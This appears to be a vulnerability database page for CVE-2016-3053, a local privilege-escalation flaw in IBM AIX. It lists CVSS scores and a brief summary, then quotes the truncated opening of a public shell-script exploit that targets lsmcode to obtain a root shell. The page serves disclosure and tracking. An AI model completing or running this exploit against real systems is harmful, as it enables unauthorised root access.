7.8
CVSSv3

CVE-2016-3053

Published: 01/02/2017 Updated: 03/09/2017
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
CVSS v3 Base Score: 7.8 | Impact Score: 5.9 | Exploitability Score: 1.8
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

IBM AIX contains an unspecified vulnerability that would allow a locally authenticated user to obtain root level privileges.

Vulnerable Product Search on Vulmon Subscribe to Product

ibm aix

Exploits

#!/usr/bin/sh # # AIX lsmcode local root exploit # # Affected: AIX 61/71/7202 # # Blog post URL: rhinosecuritylabscom/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/ # # lqueryrootsh by @hxmonsegur [2016 //RSL] ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}') if [ ! -x "/usr/sbin/lsmco ...